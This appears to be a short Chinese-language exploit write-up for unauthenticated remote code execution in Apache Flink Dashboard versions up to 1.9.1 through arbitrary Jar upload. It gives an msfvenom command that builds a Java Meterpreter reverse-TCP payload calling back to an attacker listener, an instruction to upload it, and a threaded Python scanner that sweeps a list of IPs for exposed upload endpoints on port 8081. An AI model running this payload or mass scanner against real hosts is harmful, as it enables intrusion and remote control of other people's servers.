Apache Flink Dashboard 未授权访问-远程代码命令执行¶
一、漏洞简介¶
Apache Flink的任意Jar包上传导致远程代码执行的漏洞
二、漏洞影响¶
<= 1.9.1(最新版本)
三、复现过程¶
1、
msfvenom -p java/meterpreter/reverse_tcp LHOST=10.10.20.166 LPORT=8989 -f jar > rce.jar
2、
上传alewong Jar包
批量脚本
https://github.com/ianxtianxt/Apache-Flink-Dashboard-rec
"""
auth: @l3_W0ng
version: 1.0
function: Apache Web Dashboard RCE
usage: python3 script.py ip [port [command]]
default port=8081
"""
import os
import subprocess
import requests
from multiprocessing.dummy import Pool as ThreadPool
def get_iplist():
iplist = []
with open('iplist', 'r') as file:
data = file.readlines()
for item in data:
ip = item.strip()
iplist.append(ip)
return iplist
def check_8081(ip):
url = 'http://' + ip + ':8081/jar/upload'
try:
res = requests.get(url=url, timeout=2)
data = {
'msg': res.json(),
'state': 1,
'url': url,
'ip': ip
}
except:
data = {
'msg': 'Secure',
'state': 0,
'ip': ip
}
if data['state'] == 1:
print(data)
if __name__ == '__main__':
iplist = get_iplist()
pool = ThreadPool(20)
pool.map(check_8081, iplist)
Ps:
当注释掉 if 'Unable to load requested file' in str(data):
之后,出现Token为空,或者 Unauthorized request 时候是不存在未授权访问的,而是带授权